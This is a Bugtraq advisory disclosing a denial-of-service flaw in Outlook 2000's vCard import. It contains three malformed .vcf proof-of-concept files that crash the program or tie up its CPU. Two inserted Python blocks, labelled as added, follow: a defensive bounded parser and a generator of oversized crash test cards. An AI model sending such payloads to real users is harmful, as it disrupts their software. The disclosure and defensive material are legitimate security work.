Bugtraq mailing list archives

vCard DoS on Outlook 2000


From: joelmoses () MINDSPRING COM
Date: Thu, 31 Aug 2000 11:51:20 -0400

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Vulnerability in vCard import in Outlook 2000
Released: August 30, 2000

Summary
=======

Under certain conditions, excessively long or malformed fields in a
vCard (.vcf) file can cause Microsoft Outlook 2000 either to overflow
and terminate or to consume excessive system resources.


Background
==========

The specifications for vCard MIME types and field contents can be
found in RFCs 2425 and 2426.

Although RFC 2426 section 2.6 specifies that lines longer than 75
characters are to be folded as defined in [MIME-DIR] (RFC 2425), it
appears Outlook does not support line folding and will attempt to
import any field in the file as a single value, even if it is several
pages long or (in one case) overflows a data field within Outlook.

The effect this unlimited import attempt has on Outlook 2000 varies
between field types. Some fields will cause Outlook to consume nearly
all CPU time, and certain others (especially date/revision fields and
e-mail fields) will cause Outlook to terminate immediately due to an
overflow.
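The following is an added example, not code from the advisory or from Microsoft: a small vCard reader that does what the advisory says Outlook 2000 did not do, namely unfold RFC 2425 continuation lines and put a bound on every value before it is handed to anything with a fixed-size field. The sample card and the 84-digit BDAY are constructed here, and the per-property caps in MAX_VALUE_LEN are assumed values chosen for the example; the advisory gives no such numbers beyond the BDAY threshold it observed.

```python
import re
from dataclasses import dataclass, field

# RFC 2425 5.8.1 / RFC 2426 2.6: content lines should be folded at 75 octets.
MAX_LINE_OCTETS = 75
# Per-property value caps. These are assumptions chosen for this example (the
# advisory only reports that a BDAY of roughly 52-55+ characters crashes Outlook);
# the point is that every value gets *some* bound before it reaches a fixed buffer.
MAX_VALUE_LEN = {"BDAY": 20, "REV": 32, "EMAIL": 254, "TEL": 64, "N": 256, "FN": 256}
DEFAULT_MAX_VALUE_LEN = 1024

# Constructed sample card (not the advisory's): the NOTE is folded per RFC 2425
# (CRLF followed by one space), which is exactly what Outlook 2000 did not handle.
SAMPLE_VCARD = (
    "BEGIN:VCARD\r\n"
    "VERSION:2.1\r\n"
    "N:Berger;Meister\r\n"
    "FN:Meister Berger\r\n"
    "NOTE:The Mayor of the great city of Goerlitz in the great country\r\n"
    "  of Germany.\r\n"
    "TEL;WORK;VOICE:(873) 323-3213\r\n"
    "BDAY:19630915\r\n"
    "EMAIL;PREF;INTERNET:mb@goerlitz.de\r\n"
    "END:VCARD\r\n"
)
# Same card with an 84-digit BDAY, the shape of the advisory's first example
# (the digits are constructed, not the advisory's).
OVERSIZED_BDAY_VCARD = SAMPLE_VCARD.replace("BDAY:19630915", "BDAY:19630915" + "7" * 76)


@dataclass
class Property:
    name: str
    params: list
    value: str


@dataclass
class ParseResult:
    properties: list = field(default_factory=list)
    violations: list = field(default_factory=list)


def unfold(text):
    """RFC 2425 unfolding: a line break immediately followed by one space or tab
    is removed together with that whitespace, reassembling the logical line."""
    return re.sub(r"\r?\n[ \t]", "", text)


def parse_vcard(text):
    """Parse a vCard into properties while enforcing folding and value bounds.
    Oversized or malformed values are recorded as violations and dropped rather
    than passed downstream, which is the check Outlook 2000 lacked."""
    result = ParseResult()
    # Physical-line check before unfolding: a producer that never folds is itself a signal.
    for lineno, line in enumerate(text.splitlines(), 1):
        octets = len(line.encode("utf-8"))
        if octets > MAX_LINE_OCTETS:
            result.violations.append(f"line {lineno}: {octets} octets, not folded at {MAX_LINE_OCTETS}")
    for logical in unfold(text).splitlines():
        if not logical.strip():
            continue
        head, sep, value = logical.partition(":")
        if not sep:
            result.violations.append(f"malformed content line: {logical[:40]!r}")
            continue
        name, *params = head.split(";")
        name = name.upper()
        limit = MAX_VALUE_LEN.get(name, DEFAULT_MAX_VALUE_LEN)
        if len(value) > limit:
            result.violations.append(f"{name}: value is {len(value)} chars, limit {limit}")
            continue
        # Type check on the field the advisory found most fragile: BDAY must be a date.
        if name == "BDAY" and not re.fullmatch(r"\d{8}|\d{4}-\d{2}-\d{2}", value):
            result.violations.append(f"BDAY: not a date: {value[:20]!r}")
            continue
        result.properties.append(Property(name, params, value))
    return result


if __name__ == "__main__":
    for label, card in (("sane", SAMPLE_VCARD), ("oversized bday", OVERSIZED_BDAY_VCARD)):
        r = parse_vcard(card)
        print(label, "->", len(r.properties), "properties,", r.violations)
```

Run against the sane card the NOTE comes back as one logical value and nothing is flagged; against the oversized card the BDAY line is flagged twice (an unfolded 89-octet physical line, and a value over the cap) and the property is dropped instead of being imported. Note that vCard 2.1 folding keeps the leading whitespace where RFC 2425 drops it; the unfold() above follows RFC 2425, the specification the advisory cites.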


Severity
========

Outlook 2000 does not open and import a .vcf file received via e-mail
without prompting the user first. However, vCard files are extremely
common, and many users have trained themselves to click through the
warning dialog box.

Outlook does, however, open a vCard file with no questions asked if
the user saves it to a directory and double-clicks it from Windows
Explorer. In this situation the vCard is processed directly, with no
warning or status messages displayed to the user.


Affected Configurations
=======================

Microsoft Outlook 2000 was the only platform tested (on Windows NT
4.0 Workstation, Service Pack 6a plus hotfixes).

Affected fields in vCard file causing an overflow:

- email:
- bday;value=date (as low as 52 characters of form YYYY-MM-D(60)

Affected fields in vCard file causing excessive CPU utilization:

- name:
- nickname:
- fn:
- title:
- title;language=de;value=text:
- tel:
- tel;<label>:
- tel;<label>,<label>:

Fields which do not appear to be affected:

- note:

Fields which do not appear to be supported:

- any fields which continue on the next line or have defined newlines
  per RFC 2425
- key:
- o:

No other fields were tested.


Examples
========

The following examples will cause the described behavior.

1) A modification of the "bday" field to extend beyond 55 characters.
This example appears to be the smallest amount of text required to
elicit the symptom. It will cause Outlook 2000 to overflow and
terminate.

BEGIN:VCARD
VERSION:2.1
N:Berger;Meister
FN:Meister Berger
NICKNAME:Sadf
ORG:Test;e3425454
TITLE:Burgermeister
NOTE:The Mayor of the great city of Goerlitz in the great country of Germany.
TEL;WORK;VOICE:(873) 323-3213
TEL;HOME;VOICE:(873) 323-3213
TEL;CELL;VOICE:(873) 323-3213
TEL;VOICE:+49 3581 1234
TEL;WORK;FAX:(873) 323-3213
ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United States of America
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423 efdsdfsd=0D=0A4534534tertgerwtgr, TN  34564=0D=0AUnited State=
s of America
URL:
URL:http://bin.false/
ROLE:sadf
BDAY:196309151308482734927497239479237492739423947927349723947293749274982739472937492873
EMAIL;PREF;INTERNET:mb@goerlitz.de
REV:20000830T191121Z
END:VCARD

2) A modification of the "e-mail" field with a large amount of text
data masquerading as an e-mail address. This example will cause
Outlook 2000 to overflow and terminate.


BEGIN:VCARD
VERSION:2.1
N:Berger;Meister
FN:Meister Berger
NICKNAME:Sadf
ORG:Test;e3425454
TITLE:Burgermeister
NOTE:The Mayor of the great city of Goerlitz in the great country of Germany.
TEL;WORK;VOICE:(873) 323-3213
TEL;HOME;VOICE:(873) 323-3213
TEL;CELL;VOICE:(873) 323-3213
TEL;VOICE:+49 3581 1234
TEL;WORK;FAX:(873) 323-3213
ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United States of America
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423 efdsdfsd=0D=0A4534534tertgerwtgr, TN  34564=0D=0AUnited State=
s of America
URL:
URL:http://bin.false/
ROLE:sadf
BDAY:19630915
EMAIL;PREF;INTERNET:mb@goerlitz.de.sadsack.nothing.doing.is.an.overflow.possible.sadsack.nothing.doing.is.an.overflow.possible.

<content clipped for brevity - envision lots of text here>

.sadsack.nothing.doing.is.an.overflow.possible.com
REV:20000830T191121Z
END:VCARD

3) A modification of the "N" (name) field with a large amount of text
will not cause Outlook to terminate, but will raise Outlook's CPU
utilization to 99%.

BEGIN:VCARD
VERSION:2.1
N:Berger MeisterBerger MeisterBerger MeisterBerger MeisterBerger
MeisterBerger Meister

<content clipped for brevity - envision lots of text here>

Berger MeisterBerger MeisterBerger MeisterBerger MeisterBerger
MeisterBerger MeisterBerger  MeisterBerger Meister
FN:Meister Berger
NICKNAME:Sadf
ORG:Test;e3425454
TITLE:Burgermeister
NOTE:The Mayor of the great city of Goerlitz in the great country of Germany.
TEL;WORK;VOICE:(873) 323-3213
TEL;HOME;VOICE:(873) 323-3213
TEL;CELL;VOICE:(873) 323-3213
TEL;VOICE:+49 3581 1234
TEL;WORK;FAX:(873) 323-3213
ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United States of America
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423 efdsdfsd=0D=0A4534534tertgerwtgr, TN  34564=0D=0AUnited State=
s of America
URL:
URL:http://bin.false/
ROLE:sadf
BDAY:19630915
EMAIL;PREF;INTERNET:mb@goerlitz.de
REV:20000830T191121Z
END:VCARD
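The three examples above differ only in which field is blown up and by how much. The following added generator (not part of the advisory) reproduces that pattern for any property and any length, so that a tester can bisect the smallest value that triggers the crash or the CPU spin instead of pasting pages of filler by hand. The base card values are constructed placeholders in the layout of the examples above, and the filler strings are assumptions; the only thing the advisory fixes is that the oversized value is written as one unfolded line.

```python
import os
import tempfile

# Base card in the layout of the advisory's examples; the values are constructed placeholders.
BASE_PROPERTIES = [
    ("N", "Berger;Meister"),
    ("FN", "Meister Berger"),
    ("NICKNAME", "Sadf"),
    ("ORG", "Test;e3425454"),
    ("TITLE", "Burgermeister"),
    ("TEL;WORK;VOICE", "(873) 323-3213"),
    ("TEL;HOME;VOICE", "(873) 323-3213"),
    ("ADR;WORK", ";;3423 Example Street;Anytown;TN;34564;United States of America"),
    ("BDAY", "19630915"),
    ("EMAIL;PREF;INTERNET", "mb@goerlitz.de"),
    ("REV", "20000830T191121Z"),
]


def oversized_value(prop, length):
    """Filler that keeps the field's rough shape (digits for a date, user@host for
    e-mail), so that a parser with a type check still accepts it and the length is
    the only variable. The filler text itself is an assumption for this example."""
    name = prop.split(";")[0].upper()
    if name == "BDAY":
        return ("19630915" + "7" * length)[:length]          # digits only
    if name == "EMAIL":
        body = "mb@" + "overflow.possible." * (length // 18 + 1)
        return body[: length - 4] + ".com"                    # still looks like user@host
    if name == "N":
        return ("Berger Meister " * (length // 15 + 1))[:length]
    return "x" * length


def make_vcard(oversize_prop=None, length=0):
    """Return vCard 2.1 text with one property (matched on its full name and params,
    e.g. 'EMAIL;PREF;INTERNET') replaced by an unfolded value of exactly `length`
    characters. With no arguments the unmodified base card is returned."""
    lines = ["BEGIN:VCARD", "VERSION:2.1"]
    for prop, value in BASE_PROPERTIES:
        if prop == oversize_prop:
            value = oversized_value(prop, length)
        lines.append(f"{prop}:{value}")
    lines.append("END:VCARD")
    return "\r\n".join(lines) + "\r\n"


def write_testcases(directory, props=("BDAY", "EMAIL;PREF;INTERNET", "N"),
                    lengths=(32, 64, 128, 1024, 65536)):
    """Write one .vcf per (property, length) and return the paths. Open each from
    Windows Explorer (the no-prompt path) and narrow `lengths` around the first
    one that misbehaves."""
    paths = []
    for prop in props:
        for length in lengths:
            fname = f"{prop.split(';')[0].lower()}-{length}.vcf"
            path = os.path.join(directory, fname)
            with open(path, "w", newline="") as fh:   # newline="" keeps the CRLF intact
                fh.write(make_vcard(prop, length))
            paths.append(path)
    return paths


if __name__ == "__main__":
    out = tempfile.mkdtemp(prefix="vcf-")
    for p in write_testcases(out):
        print(p)
```

The files are written with CRLF line endings, as vCard requires; writing them through a text-mode handle without newline="" would turn each CRLF into CRCRLF on Windows and change what the parser sees.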


Resolution
==========

None at present, other than to disassociate the .vcf extension from
Outlook. Note that this only closes the Windows Explorer double-click
path; a .vcf attachment opened from within Outlook still goes through
the warning prompt described above. There may be more fields affected;
these are merely the initially tested ones.

-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.5.1

iQA/AwUBOa1u3MZCl66UabcJEQJADgCfUY+6ZlnpsRevurebbD/M1XrlMfIAn1TO
LSZIBp6xoMPl4Tc5unZeICka
=N+p4
-----END PGP SIGNATURE-----

